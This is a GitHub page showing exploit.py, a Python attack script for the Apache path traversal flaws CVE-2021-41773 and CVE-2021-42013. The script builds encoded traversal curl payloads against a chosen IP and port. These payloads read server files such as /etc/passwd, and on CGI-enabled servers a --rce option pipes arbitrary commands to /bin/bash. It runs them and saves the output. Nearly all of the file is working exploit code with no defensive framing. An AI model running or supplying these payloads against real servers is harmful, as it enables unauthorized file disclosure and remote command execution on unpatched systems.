-
-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit.py
91 lines (69 loc) · 4.29 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
import argparse, time
from subprocess import getoutput
#################################################################
# #
# CVE-2021-41773 & CVE-2021-42013 | "Apache Path Traversal" #
# Author: battleoverflow #
# GitHub: https://github.com/battleoverflow #
# #
#################################################################
parser = argparse.ArgumentParser(description='Apache server exploit (CVE-2021-41773 & 42013)')
parser.add_argument('--cgi', help="Use if Apache server has CGI enabled", action='store_true', default=False, required=False)
parser.add_argument('--port', help="Port that the Apache server is listening on (Default: 8080)", default=8080, required=False)
parser.add_argument('--path', help="Path to the file on the Apache server to output (Default: /etc/passwd)", default="/etc/passwd", required=False)
parser.add_argument('--ip', help="The website or IP address where the Apache server is hosted (Default: localhost)", default="localhost", required=False)
parser.add_argument('-v', help="Increases verbosity", action='store_true', default=False, required=False)
parser.add_argument('-s', help="Special payload built for Apache v2.4.50", action='store_true', default=False, required=False)
parser.add_argument('--rce', help="Offers the ability to run Remote Code Execution on CGI-enabled servers", action='store_true', default=False, required=False)
parser.add_argument('--cmd', help="Used in conjunction with --rce to run Remote Code Execution on the server (Default: whoami)", default="whoami", required=False)
args = parser.parse_args()
class ApacheExploit:
def author(self):
print("""
#################################################################
# #
# CVE-2021-41773 & CVE-2021-42013 | "Apache Path Traversal" #
# Author: battleoverflow #
# GitHub: https://github.com/battleoverflow #
# #
#################################################################
""")
def exploit_cgi(self):
print("\nExploit running with CGI enabled...\n")
print(f"[*] Attacking: {args.ip}")
print(f"[*] Port: {args.port}")
print(f"[*] Path: {args.path}\n")
time.sleep(1)
if args.rce:
payload = f"curl -v 'http://{args.ip}:{args.port}/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; {args.cmd}' -H 'Content-Type: text/plain'"
elif args.s:
payload = f"curl -v 'http://{args.ip}:{args.port}/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; cat {args.path}' -H 'Content-Type: text/plain'"
else:
payload = f"curl -v 'http://{args.ip}:{args.port}/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat {args.path}' -H 'Content-Type: text/plain'"
run_exploit = getoutput(payload)
if args.v:
print(run_exploit)
with open("apache_exploit_output_cgi.txt", "w") as f:
f.write(run_exploit)
def exploit_nocgi(self):
print("\nExploit running with CGI disabled...\n")
print(f"[*] Attacking: {args.ip}")
print(f"[*] Port: {args.port}")
print(f"[*] Path: {args.path}\n")
time.sleep(1)
if args.s:
payload = f"curl 'http://{args.ip}:{args.port}/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65{args.path}'"
else:
payload = f"curl -v 'http://{args.ip}:{args.port}/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e{args.path}'"
run_exploit = getoutput(payload)
if args.v:
print(run_exploit)
with open("apache_exploit_output_nocgi.txt", "w") as f:
f.write(run_exploit)
if __name__ == '__main__':
ae = ApacheExploit()
ae.author()
if args.cgi:
ae.exploit_cgi()
else:
ae.exploit_nocgi()